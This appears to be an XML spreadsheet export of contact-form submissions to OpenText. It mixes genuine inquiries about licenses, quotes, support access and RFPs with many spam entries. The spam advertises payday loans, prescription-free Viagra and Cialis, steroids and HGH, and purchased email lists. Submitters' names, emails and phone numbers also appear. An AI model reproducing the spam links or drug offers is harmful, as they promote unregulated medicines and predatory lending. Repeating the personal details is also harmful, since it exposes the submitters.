    <t>We are in the early phase of an RFP, and I am seeking contact information for our procurement department.  We are looking into a Replacement for our Enterprise Content Management System.</t>
  </si>
  <si>
    <t>Need the end of support date for product VIM 7.5 SP3. Also need the date for end of support for products ICC 7.5 SP3 and Enterprise Scan 10.0. Trying to update our software database that tells us when we need to upgrade.</t>
  </si>
  <si>
    <t>Would like a qoute for Documentum for Quality and Manufacturing.  Small business (under 10 employees).</t>
  </si>
  <si>
    <t>Just trying to keep others out of my stuff thats why its called personal!!</t>
  </si>
  <si>
    <t>Gedeon Richter PLC is planning to invite tenders to set up a new ECM system._x000D_
In order to find the proper person with this invitation, please be kind to send us the name and e-mail address of the person we can get in touch with._x000D_
I would like to request your reply by email.</t>
  </si>
  <si>
    <t>Gostaria de saber o preço do opentext imaging.</t>
  </si>
  <si>
    <t xml:space="preserve">You have a product Keyflow acquired from Global360 that is a simple workflow that runs on the older MS Exchange platform using MAPI.  It is obsolete without an upgrade.  We would have reason to upgrade it to cloud Exchange / Office 365 if source were available to us.  </t>
  </si>
  <si>
    <t>Hi there, I was looking to schedule a product demo._x000D_
Please advise._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jaime</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
My name is Rowel Havana. I believe we can help you in developing warm leads and in setting up appointments on your behalf._x000D_
_x000D_
We haven’t had a chance to speak yet, but I work for a lead generation firm with a (15) years track record of helping companies which might be particularly relevant to you in getting sales qualified leads. I know there are a LOT of salespeople making promises in my space, but we do something unique and special I’d like to share with you._x000D_
_x000D_
Are you open to a fifteen minutes call to discuss ways our company platform can specifically help your business?_x000D_
_x000D_
Hope to hear from you._x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Rowel Havana_x000D_
Sales Representative_x000D_
Direct: 310.736.3861_x000D_
CBI Marketing Solutions_x000D_
rowel.havana@cbimarketingsolutions.com</t>
  </si>
  <si>
    <t>Hi, We are looking for an Electronic Document Management system for our patient records. Is this something you can help us with? _x000D_
Many Thanks,</t>
  </si>
  <si>
    <t>Email address for Mr. Thomas Jenkins to extend an invitation to an award ceremony and dinner.</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I was wondering if you would be interested in our database of Key IT decision makers? _x000D_
_x000D_
We can provide you list of various technology Users:- Hadoop, Drupal,SharePoint,SAP, Sage, Microsoft, Oracle, Citrix, Avaya, Cisco, DBA and many more._x000D_
_x000D_
Business titles include:_x000D_
_x000D_
CTO, Chief Architect, VP/Director/SVP/Application Development, Solutions Architect, Data Center managers _x000D_
Information Technology Project Manager _x000D_
Network Manager _x000D_
Vice President, Technology _x000D_
Director of Information Technology _x000D_
SVP of Information Technology _x000D_
Product Management, Engineering, BI, BI Analysts, BI Architects, Data Analysts, so on_x000D_
_x000D_
Please let us know if you have any specific target audience I will send over a sample free of cost for your perusal.._x000D_
_x000D_
Regards, _x000D_
_x000D_
Stefan Walker_x000D_
Business Development Manager</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wie mit Herrn Unterweger besprochen, sende ich Ihnen meine Anfrage über dieses Formular. _x000D_
Bitte senden Sie mir ein Angebot zum Kauf der Domain xcms . de (Owner: Open Text GmbH, Grasbrunn)._x000D_
_x000D_
Über eine kurzfristige Antwort freue ich mich._x000D_
Mit freundlichen Grüßen_x000D_
Matthias Veith</t>
  </si>
  <si>
    <t xml:space="preserve">Geachte heer / mevrouw, _x000D_
_x000D_
Graag wil ik mij voorstellen. Mijn naam is Vahideh Shemshad en ik ben de sales executive van het Best Western Grand Winston hotel op de Generaal Eisenhowerplein in Rijswijk._x000D_
_x000D_
Ons hotel is eenvoudig te bereiken vanaf de snelweg en wij beschikken over parkeergelegenheid op eigen terrein. Bovendien zijn we gestationeerd naast het centraal station van Rijswijk waardoor u niet alleen gebruik kunt maken van de trein, maar ook bus en tram. _x000D_
_x000D_
Als hotel hebben wij 6 vergaderzalen en de capaciteit tot 250 personen in onze grote zaal. Wij weten als geen ander hoe belangrijk een bijeenkomst is voor u als bedrijf maar ook voor de deelnemers en daarom maken wij uw bijeenkomst graag compleet. Van bloemstukken tot aankleding van de zalen in de kleur van uw keuze, niets is onmogelijk. _x000D_
_x000D_
Graag kom ik in contact met de juiste persoon binnen uw organisatie en plan ik een gesprek in om verdere opties vrijblijvend te bespreken. Ik ben u graag van dienst als het gaat om vergaderruimtes, seminars, lezingen, master classes, hotelovernachtingen, verzorgde borrels en of (privé) etentjes._x000D_
_x000D_
Om u een indruk te geven ons hotel doe ik u graag onze banquet brochure toekomen.  _x000D_
_x000D_
Met vriendelijke groet/Kind Regards, _x000D_
_x000D_
Vahideh Shemshad_x000D_
Sales Executive_x000D_
 _x000D_
BEST WESTERN PLUS GRAND WINSTON_x000D_
_x000D_
Generaal Eisenhowerplein 1_x000D_
2288 AE  Rijswijk_x000D_
Telefoon: +31 (0) 70 – 4141500_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Dentists list (60,898 contacts with emails) is available for unlimited usage _x000D_
Last update: April 2nd, 2018 _x000D_
Reach us to get quote and sample contacts._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Bert Connell_x000D_
</t>
  </si>
  <si>
    <t>Please update administrators (able to place support tickets) for Members 1st to remove "triscarib@members1st.org" - this individual hasn't worked here in years. Please add "ImagingAdmin@members1st.org" - for the admin as this account isn't tied to one single user, or if you need an individual, add my user.</t>
  </si>
  <si>
    <t>Regarding Job (Manual Testing and Automation Testing Selenium)</t>
  </si>
  <si>
    <t>Would like a quote for the RightFax Enterprise Server</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans no credit check[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit&lt;/a&gt; _x000D_
payday loans online no credit check</t>
  </si>
  <si>
    <t>we would like to invite your company to participate in the tender. Please share your contacts for sending an invitation</t>
  </si>
  <si>
    <t xml:space="preserve">Our current product machine (windows base) is obsolete by Humana standards and needs to be replaced. We are requesting the production license for windows PC to install on the new machine.   </t>
  </si>
  <si>
    <t>Researching options for tools and services to help convert Lotus Notes to a more open interface using SQL Server as a back end.</t>
  </si>
  <si>
    <t>Need to get the correct version of temporary license for Acctuate - v11sp5.  Previous license key that was sent was the wrong version.  Working with Scott Repp.</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans online no credit check[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online no credit check&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>I would like know more about "OpenText Alchemy 9" but the link* to get it_x000D_
is broken._x000D_
Is there another option for me to download the product?</t>
  </si>
  <si>
    <t>Software Update of Documentum</t>
  </si>
  <si>
    <t>Das nГ¶tige  PrГ¤parat zur  VerstГ¤rkung von Geschlechtsfunktionen kГ¶nnen Sie  zu jeder Zeit auf unserer  der  Internetressource oder  per Telefon  unmittelbar mithilfe von unseren Mitarbeitern  bestellen , und zwar unter der Telefonnummer, die auf der Seite von der Internet-Apotheke  vermerkt  ist. Sie kГ¶nnen die Bestellung   wie Sie wГјnschen bezahlen , die Lieferung des bestellten  Mittels  geht in  sehr kurzer Zeit. _x000D_
[url=https://internet-ok.de/potenzmittel/viagra_generika_kaufen/]sildenafil rezeptfrei aus deutschland[/url] _x000D_
Das  erforderliche  PrГ¤parat zur Wiederherstellung  von Geschlechtsfunktionen  haben Sie die MГ¶glichkeit zu jeder Zeit  bei uns auf der  Internetressource oder  per Telefon direkt  mithilfe von unseren  Kundenberatern   erwerben, und zwar unter der Telefonnummer, die auf der Seite von  der Online-Apotheke vermerkt  ist. Sie kГ¶nnen die Bestellung  auf Ihren Wunsch  bezahlen , die Lieferung des bestellten  Mittels erfolgt  in maximal  kurzer Zeit. _x000D_
[url=https://internet-ok.de/]apotheke ohne versandkosten[/url] _x000D_
In unserer  Apotheke  ist es mГ¶glich in jedem Moment das nГ¶tige PrГ¤parat  zu kaufen , und zwar ohne aus  der Wohnung zu gehen, und schon  bald werden Sie die Herrlichkeiten  des  Intimlebens genieГџen . Wir bieten  sehr  wirksame   PrГ¤parate вЂ“ Levitra, Cialis, Viagra, Kamagra. _x000D_
[url=https://internet-ok.de/]viagra online bestellen[/url] _x000D_
Das nГ¶tige  PrГ¤parat zur Wiederherstellung  von Geschlechtsfunktionen kГ¶nnen Sie  zu jeder Zeit  bei uns auf der  Seite  oder  per Telefon  unmittelbar mithilfe von unseren  Spezialisten  erwerben, und zwar unter der Telefonnummer, die auf der Seite von  der Online-Apotheke  angegeben ist. Sie kГ¶nnen die Bestellung  auf Ihren Wunsch   zahlen, die Lieferung des bestellten  Mittels  geht in maximal  kurzer Zeit. _x000D_
[url=https://internet-ok.de/potenzmittel/cialis_soft_tabs_kaufen/]cialis soft tabs generika[/url]</t>
  </si>
  <si>
    <t>п»їFГјhrende   Online-Apotheke  Deutschlands empfehlt  qualitative  und effektive  PrГ¤parate , die bei Behandlung des Geschlechtssystems   helfen werden. Anhand von diesen   Mittel wird man nicht nur  auf bestimmte Zeit   diese Krankheit  loswerden, sondern  vollstГ¤ndig diese  Erkrankung bekГ¤mpfen . _x000D_
[url=https://internet-ok.de/potenzmittel/cialis_generika_kaufen/]cialis generika kaufen osterreich[/url] _x000D_
п»ї BerГјhmte   Online-Apotheke  Deutschlands  bietet qualitative  und  wirksame  Mittel, die bei Behandlung  der Geschlechtsfunktion helfen . Anhand von diesen  PrГ¤paraten  wird man nicht  einfach auf bestimmte Zeit   diese StГ¶rungen loswerden, sondern vГ¶llig  solche Erkrankung  auskurieren. _x000D_
[url=https://internet-ok.de/]sildenafil bestellen[/url] _x000D_
п»ї Bekannte Internet-Apotheke  Deutschlands  unterbereitet  qualitative  und  wirksame  Mittel, die bei Behandlung des Geschlechtssystems  helfen .Mithilfe von diesen  PrГ¤paraten  wird man nicht  einfach  kurzzeitig  diese Krankheit  loswerden, sondern  vollstГ¤ndig  solche Erkrankung bekГ¤mpfen . _x000D_
[url=https://internet-ok.de/]cialis lilly[/url] _x000D_
 Bei uns  Online-Apotheke   haben Sie eine MГ¶glichkeit in jedem Moment  das nГ¶tige Mittel zu  erwerben, und zwar ohne aus dem Haus  zu gehen, und schon in KГјrze  werden Sie die  Pracht des  Intimlebens  genieГџen kГ¶nnen. Wir  verkaufen  extrem wirksame   PrГ¤parate вЂ“ Levitra, Cialis, Viagra, Kamagra. _x000D_
[url=https://internet-ok.de/]deutsche internetapotheke[/url]</t>
  </si>
  <si>
    <t>Good morning _x000D_
_x000D_
i don't arrive to activate my account , he does not recognize the  code of activation ( 1874312-113070866-117254 ) thank you for your support</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi_x000D_
We can help your website to get on first page of Google and increase the number of leads and sales you are getting from your website. Please email us back for full proposal._x000D_
_x000D_
Best Regards_x000D_
Andy   </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Customer,_x000D_
_x000D_
My name is Cesar   and I am contacting you on behalf of  Entcorp france sa We are part of a team specialising in the allocation of customer payments._x000D_
_x000D_
Our records show that there was a payment of 11,692.80 Euros posted on to our system on 04/01/2018 . Please can I ask you to forward the remittance details to us at your earliest convenience, so that we can apply the payment correctly to the invoices on your account._x000D_
_x000D_
We realise that you may have been contacted before and indeed may have already supplied this information, so apologies in advance for this and thank you for your understanding._x000D_
_x000D_
Kindest regards_x000D_
_x000D_
_x000D_
Cesar Nguiffo_x000D_
Credit &amp; Collections_x000D_
Tel: +353-1-605-8265_x000D_
E-mail : Cesar.Nguiffo@microfocus.com_x000D_
_x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
we are a German software distributor and reseller. One of our customers is interested in_x000D_
_x000D_
1x_x000D_
Open Text_x000D_
_x000D_
Please quote us reseller prices/discount rates for this software (EU &amp; UK) and tell us also about the _x000D_
 _x000D_
-      available language(s) _x000D_
-      the way you deliver this software _x000D_
-      times of delivery and/or handling_x000D_
-      the costs of freight/handling (ESD/boxes)_x000D_
-      optional or necessary maintenance_x000D_
-      SKU number if available/existing_x000D_
-      payment options_x000D_
-      additional information needes for the purchasing process_x000D_
_x000D_
Thanks for your effort._x000D_
_x000D_
I will be glad to respond to any further queries you may have._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
As a QA&amp;QC Engineer of Renaissance Construction Company, I would like to inform you that we are recently searching for a Document Management software and collecting alternatives for now._x000D_
_x000D_
That’s why we would like to learn more about your ECM systems. _x000D_
_x000D_
Looking forward to getting your answer as soon as possible._x000D_
_x000D_
Best Regards,_x000D_
</t>
  </si>
  <si>
    <t>Pag-IBIG Fund is currently looking for an ECM System that will cater growing need of the Fund to manage its records (physical and electronic). Hoping to hear from you ASAP.</t>
  </si>
  <si>
    <t>Hi,_x000D_
As professional Services company, we need to add an additional customer in our list of partner. This feature (seems to be) is not available (or not found) on line. What is the procedure ? Same goes for the number of customer sites available in the ticket list. We cannot select all our customer: the error message mentions that for additional customers in the list, we have to contact Opentext._x000D_
Can you help us for those issues ?_x000D_
Thanks and regards_x000D_
Yann THOMAS</t>
  </si>
  <si>
    <t xml:space="preserve">I have forgotten my password and need my Password reset  thanks </t>
  </si>
  <si>
    <t>I need more information on your document management system. This form is redundant.</t>
  </si>
  <si>
    <t>Update opentext licence due to upgrade of Infor M3 solution to v 13.4. (need storyteller and javaout license). Customer ID from current license file is EU00159382 and Openext versin 5.6.2</t>
  </si>
  <si>
    <t>Производство всех видов электромонтажного _x000D_
оборудования для прокладки кабеля в Санкт-Петербурге _x000D_
 _x000D_
[URL=http://astra-electric.ru/index.php?id_category=44&amp;controller=category]перфопрофиль п-образный[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?controller=product&amp;id_product=73]перфоуголок оцинкованный[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_category=42&amp;controller=category]проволочные лотки для прокладки кабеля[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=101&amp;controller=product]перфошвеллер 45х30[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=94&amp;controller=product]перфошвеллер уэк533у1[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=37&amp;controller=product]кабельный лоток металлический[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_category=42&amp;controller=category]купить лоток для прокладки кабеля в спб[/URL]_x000D_
[URL=http://astra-electric.ru/]монтажные системы[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=101&amp;controller=product]крышка перфошвеллера 45х30[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=100&amp;controller=product]перфошвеллер u-образный к225 80х40х2000 2.5 купить в саратове[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=74&amp;controller=product]оцинкованная перфорированная полоса в бухтах 1 х 20[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?controller=product&amp;id_product=73]угол перфорированный[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?controller=product&amp;id_product=64]полка кабельная к1162[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=22&amp;controller=product]лестницы кабельные л-100 грунтованная сталь, направляющая сплошная, полка прямая расположением снизу[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_product=99&amp;controller=product]швеллер перфорированный 45*25*2000[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?controller=product&amp;id_product=86]кабельный лоток перфорированный[/URL]_x000D_
[URL=http://astra-electric.ru/index.php?id_category=42&amp;controller=category]лоток м</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;loans online&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.pengarportalen.se/lana-pengar-utan-inkomst/]lГҐn utan krav pГҐ inkomst[/url]_x000D_
 _x000D_
п»їUC Г¤r en fГ¶rkortning fГ¶r Upplysningscentralen. Den Г¤gs i huvudsak av de stora bankerna i Sverige nГ¤mligen Nordea, Swedbank, Handelsbanken och Skandinaviska Enskilda Banken. UtГ¶ver UC finns det mГҐnga aktГ¶rer som sГ¤ljer kreditinformation, bland annat Bisnode, Creditsafe och Instantor. Varje gГҐng en fГ¶rfrГҐgan lГ¤mnas till UC blir detta registrerat. MГҐnga fГ¶rfrГҐgningar hos UC inverkar negativt pГҐ en privatpersons kreditvГ¤rdighet._x000D_
 _x000D_
[url=http://www.pengarportalen.se/rantefritt/]lГҐna pengar utan rГ¤nta[/url]_x000D_
</t>
  </si>
  <si>
    <t>payday loans _x000D_
[url=https://smajloans.com/]payday loans online[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit check&lt;/a&gt; _x000D_
payday loans online</t>
  </si>
  <si>
    <t>Good morning!_x000D_
_x000D_
I would like to ask a question about your Brava! for Desktop product._x000D_
Could I please ask what is the difference between TX and TXL version?_x000D_
More precisely:_x000D_
Does the TX version also offer the measurement function?_x000D_
_x000D_
I was able to download and try the trial of the software, but unfortunately I was not able to set which version of the software I would like to try out. The trial shows me the options of the IXL version, so all the possible options of the software. _x000D_
_x000D_
Is there a possibility to request a 1-2 day long trial for a specific version of the software?_x000D_
_x000D_
Br,_x000D_
Gabriel Pint</t>
  </si>
  <si>
    <t>Dear Sir/ Madame, _x000D_
I was hoping you would be able to confirm Ms Alka Hariharan's contact email address? My managing director is currently in communication with Mike Lord but we have been unable to find this address. Thank you very much for the help._x000D_
Kind regards,_x000D_
Jessica Nelson</t>
  </si>
  <si>
    <t xml:space="preserve">Access to MY Support._x000D_
Alternate Info you might need;_x000D_
-              Company/Alternate company name - Theformsagency_x000D_
-              The name of a colleague who has MySupport  access – Shashi Prakash_x000D_
-              The name of a colleague who has logged a ticket with us recently - Shashi Prakash_x000D_
-              An old ticket number. 2386061_x000D_
-              OpenText product name and version – Opentext Exstream 16_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">buy viagra online overnight shipping_x000D_
 [url=http://xlviagragtr.com]viagra pills for sale online_x000D_
[/url]  viagra inurl:/aska.cgi_x000D_
 &lt;a href="http://xlviagragtr.com"&gt;viagra pills for sale_x000D_
&lt;/a&gt; - viagra 20 mg 12 table sort by_x000D_
 where to buy viagra in riyadh_x000D_
</t>
  </si>
  <si>
    <t>Need access to developer tools to build an application</t>
  </si>
  <si>
    <t>Need below information to access MY SUPPORT site,_x000D_
PRODUCT LINE:_x000D_
END USER NUMBER:_x000D_
NAME OF CO-WORKER_x000D_
System ID/Serial Number/PIN/VPS_x000D_
_x000D_
State Street has license for e.Spreadsheet API, need to access MY SUPPORT site for few questions, support related questions</t>
  </si>
  <si>
    <t xml:space="preserve">Brava Desktop server down "[‎4/‎10/‎2018 10:10 AM] Mukesh Kshirsagar: _x000D_
it;s shows "Invalid License_x000D_
Unable to load files_x000D_
Network license communicator error_x000D_
"4_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I cannot access the knowledge center anymore, can you please advise on how I can access it again._x000D_
_x000D_
Thanks _x000D_
Ederich</t>
  </si>
  <si>
    <t>We have a medical client that wants to centralize and eliminate fax machines. I am very familiar with RightFax (although a long time ago) and feel this would be the right tool to use. I need some guidance and pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ledyourparty.com/wp-includes/work.php?how=Getropin-Italia-Ansomone-Italia-Igf-1-Valori-Alti-59.html]Getropin Italia[/url]_x000D_
 If you're searching for a option for the zit that's just beginning to look, look in the fridge! Applying an ice cubes pack on the spot for about 10 moments multiple times throughout the day will assist decrease the soreness and might end the blemish dead in it's songs. This can be a fantastic solution for the bothersome pimple that shows up just before your " special " day!_x000D_
  [url=http://www.redaut.se/component/help.asp?green=158]Kamagra Apoteket[/url]_x000D_
 Life is too short to become wasted dealing with adverse feelings. Retain the tips and advice in this post at heart, if you believe you might be frustrated or know someone who may be. Shine the light of this knowledge to you and you can feel much better, in no time at all.For A Greater Coffee, Acquire Our Assistance_x000D_
  [url=http://www.dilekolay.net/images/main.asp?t=144-Riptropin-For-Sale-Hygetropin-Hgh-Side-Effects-Hgh-Injections-For-Sale]Riptropin For Sale[/url]_x000D_
 When you are somebody who may have been traveling the very long highway towards hypersensitivity relief, that relief is eventually available for you. This information has released you to some established allergic reaction relief strategies that you can use successfully, commencing right away. Spend some time to analyze the tips and discover those which job right for you. Reduction is just around the corner!Controlling Your Cash: What You Ought To Find Out About Stock Market Purchases_x000D_
  [url=http://www.soukkari.com/libraries/daring.php?review=347]human growth hormone injections brands[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am interested in discussing your Workforce Engagement Systems for a potential fit with our QA implementation plans here at HomeAway.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for an sales engagement to initially review open-text understanding and capabilities around Iot, big-data analytics and AI with reference to our utilities (water, wastewater and Energy) business.  We are in the initial assessment phase and multi-vendor engagement.  </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.dance.farm/templates/sky.php?once=Oxymetholone-25mg-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate-889.html]Oxymetholone 25mg[/url]_x000D_
 Individuals who do business from home can make use of gourmet coffee to overcome the feeling of cabin fever. Numerous coffee shops have free world wide web on spot, so that you can consider doing a bit of job there as an alternative. Alternatively, numerous dining places provide you with the very same._x000D_
  [url=http://www.creativebusinessservices.net/wp-content/slider.php?n=353-Clomid-Australia-Side-Effects-Testosterone-Powder-India-Trenbolone-Cost-Uk/]Clomid Australia Side Effects[/url]_x000D_
 Combine your mobile marketing plan along with other multimedia shops. Mobile phone marketing and advertising is most effective when paired as well as outside resources. Ensure you have particular mobile phone obtaining webpages for every single mobile banner ad. You would probably must also blend a fast Reaction rule to drive traffic towards that website. Including your resources create your possibilities unlimited._x000D_
  [url=http://www.villadiego-hotel-diegosuarez.com/cache/name.php?ai=1216-Testosterone-Boosters-Walmart,Clomiphene-For-Men,Nandrolone-Wholesale]Testosterone Boosters Walmart[/url]_x000D_
 Introducing action delicate lighting in your home will get you a fantastic lower price in your property insurance rates. You will end up reducing the home's probability of break in and this will therefore decrease how much cash that you have to spend for your own home premiums annually and also increase the stability of your residence._x000D_
  [url=http://www.shreechankyavidhyasankul.in/shadmin/slider.php?school=108]Boldenone Generic[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a program that can be used by my law firm to analise documents. </t>
  </si>
  <si>
    <t>We're interesting in Rightfax and it's integration with Epic hosted by OCHIN. I've been told by our account managers from both CDW-G and Zones that they have not been able to get a response with regards to obtaining pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to review OpenText document management solutions for HR employee documents.  This includes scanner integration, document storage/access, document editing, workflow management, integration with Oracle EBS and Taleo.  </t>
  </si>
  <si>
    <t>Set up a new account. Please give me a call or email at your earliest convenience.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I understand that you’re an provider of “Content management software”._x000D_
_x000D_
Would you be interested in purchasing an opt-in email list for expanding your market reach? _x000D_
_x000D_
Please let me know your requirement. I’ll get back to you with counts and pricing information shortly._x000D_
_x000D_
Target industry: ____________; Job titles:______________; Geography: _________________x000D_
_x000D_
Thanks_x000D_
Adam_x000D_
</t>
  </si>
  <si>
    <t>Главной причиной возникновения и развития пульпита является воспаление соединительной волокнистой ткани, находящейся внутри зуба. Эту ткань стоматологи называют пульпой, отсюда и название заболевания – пульпит, подробнее об этом читайте на сайте [url=http://medinfon.ru]medinfon.ru[/url]</t>
  </si>
  <si>
    <t>Understand that you provide a service to provide sentiment analysis. Are the programs capable of pulling in large amount of qualitative data and finding themes within this?</t>
  </si>
  <si>
    <t>Currently have Brava Reader (free licence) to view Tiff files.  Expires shortly.  Looking to renew Brava Reader Licence or equivalent for approx 50 - 150 users.  Only require to view TIFFs.  Please advise quote this week.  Thanks</t>
  </si>
  <si>
    <t>How can I obtain Redact-it?</t>
  </si>
  <si>
    <t>Nos gustaría que nos hicieran una presentación sobre Open text: Cuánto tiempo toma típicamente la implementación de este tipo de proyectos, qué se requiere del cliente, en qué empresas de Colombia lo han implementado.</t>
  </si>
  <si>
    <t>Unable to rotate QR code, option is grayed out. Please expedite.</t>
  </si>
  <si>
    <t>Please contact me about my BizLink 10TP Maintenance Renewal.</t>
  </si>
  <si>
    <t>Our division of D&amp;Z is currently investigating potential replacements for our document management system. Please contact me at your earliest convenience to discuss if OpenText Documentum may be a potential option for our office._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
We are GSA &amp; NASA SEWP V prime contractor. We need a price quote for one of federal opportunity "Annual Maintenance Renewal for Documentum". Please contact  me at zia@enterprisesol.com so i  may share complete RFQ detail._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Zia Adnan</t>
  </si>
  <si>
    <t>payday loans no credit check _x000D_
[url=https://smajloans.com/]payday loans online no credit check[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans online no credit check&lt;/a&gt; _x000D_
payday loans online no credit check</t>
  </si>
  <si>
    <t>Discuss solution offerings to see if it's a good fit to explore a potential partnership between Tekstream and OpenText.</t>
  </si>
  <si>
    <t>Require a demo to facilitate purchase for a Government-wide document management system</t>
  </si>
  <si>
    <t>Hello,_x000D_
We have received last week a mail from OpenText Connect telling us that our account has been registered, then created._x000D_
However, we still can access to support. We have "Requested Confirmation Email" and validated it, but still no accass possible. Could you grant us the access._x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi,_x000D_
We're currently working on a project for Power NI to carry out an evaluation on solutions for letter/bill printing for customers. We have a questionnaire developed if possible we'd like to send to you at OpenText, which will greatly help in our evaluation phase of the project._x000D_
_x000D_
Kind regards,_x000D_
Andrew Murphy.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Would you be interested in acquiring the newly updated "Pathology Professionals Database” includes complete contact details and verified email addresses for your marketing products.   _x000D_
Database include: Forensic Pathologists, Anatomical Pathologists , Neuropathology and Pediatric Pathology, Pathologist Assistants/Anatomical Pathology Technologists/Morgue Technicians, Forensic Scientists, Investigating and Regional Coroners, Crown Attorneys, Defence Lawyers, Police Homicide Investigators, Forensic Identification Officers, Crime Scene Examiners and Scenes of Crime Officers, Clinical researchers, Clinicians, Technologists, Laboratory Managers, Physicians and Supplier representatives and many more…_x000D_
We also insist Physicians specialties available in our database: Anesthesiologists, Radiologists, Oncologists, Gastroenterology, Dentists, Urologists, Otolaryngologists, Veterinary, Dermatologists, Cardiologists, Nurses, Ophthalmologists, Pharmacist, Pediatricians, Surgeons, Psychiatrist, Neurologists, Hematologists, Plastic Surgeons &amp; many more…_x000D_
We guarantee 90% accuracy on the Emails and 95% accuracy on all the other data information. Our Data is GDPR Complaint._x000D_
Let me know your target criteria to send you count and cost information._x000D_
_x000D_
Target Industry       :   _x000D_
Target Geography:                      _x000D_
Target Job Title       :  _x000D_
Thanks &amp; Regards,_x000D_
Maria Juliana| Business Development coordinator_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Looking for a product that will allow us to take standard company forms that must be consistent in content across customers and easily brand those documents individually for customers.</t>
  </si>
  <si>
    <t>We are looking for faxing solutions - need to know if Rightfax will support SAP EHP8.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Dans le cadre du projet de l'un de nos contacts, nous sommes à la recherche d'une solution permettant de pousser des documents créés depuis StreamServe vers SharePoint Online._x000D_
Existe-t-il une solution permettant cela ?_x000D_
_x000D_
Bien cordialement,_x000D_
_x000D_
Mathieu LORMEAU</t>
  </si>
  <si>
    <t>License for Exstream AFP Viewer</t>
  </si>
  <si>
    <t>payday loans online no credit check _x000D_
[url=https://smajloans.com/]payday loans online no credit check[/url] _x000D_
&lt;a href="https://smajloans.com/"&gt;payday loans no credit&lt;/a&gt; _x000D_
payday loans no credit check</t>
  </si>
  <si>
    <t>_x000D_
We are delighted to welcome your Speaker participation at the International Artificial Intelligence Congress._x000D_
_x000D_
Artificial Intelligence congress will be hosted in the beautiful city of Amsterdam, Netherlands during October 25-26, 2018. We would be pleased to meet your presence at the conference proceedings._x000D_
_x000D_
Looking forward to hear from you soon</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.celikleryalitim.com/css/simple.asp?yonlen=386-igf-lr3-fat-loss-hygetropin-100iu-brown-tops-igf-lr3-results]igf lr3 fat loss[/url]_x000D_
 A great golfing idea is to successfully placed your complete system in your swing because this can create a significant difference regarding just how far your ball may go. To ensure you obtain the optimum length in your golf swing, you ought to first draw back on the membership although making certain both hands stay right. Then, a bit turn your legs and hips and follow-through on the downwards golf swing by switching your legs and hips back to the golf ball. You must do this in a single movements._x000D_
  [url=http://www.bharat-enterprises.com/products/class.asp?ttg=458]Viagra 100 Miligramos[/url]_x000D_
 In case you have symptoms of asthma, describe your problem to close friends and family. If you have to make lifestyle changes, it is vital that the people you reside with are manufactured conscious of these adjustments. Instruct them concerning your condition. They must understand the details and why modifications should be produced._x000D_
  [url=http://www.ninjo.dk/Images/get.asp?f=490-Generique-Viagra-Maroc-Acheter-Cialis-Pas-Cher-Acheter-Cialis-Tadalafil/]Generique Viagra Maroc[/url]_x000D_
 Pet dogs rapidly discover regardless of whether you undoubtedly count on them to answer your directions whenever or if perhaps they could possibly pull off not obeying on occasion. Don't deliver untrue messages! Don't give your puppy a order until you are willing to follow through and guarantee your pet dog obeys that order._x000D_
  [url=http://www.akinpetrol.com/css/router.asp?s=224]Kamagra Oral Jelly Information[/url]_x000D_
</t>
  </si>
  <si>
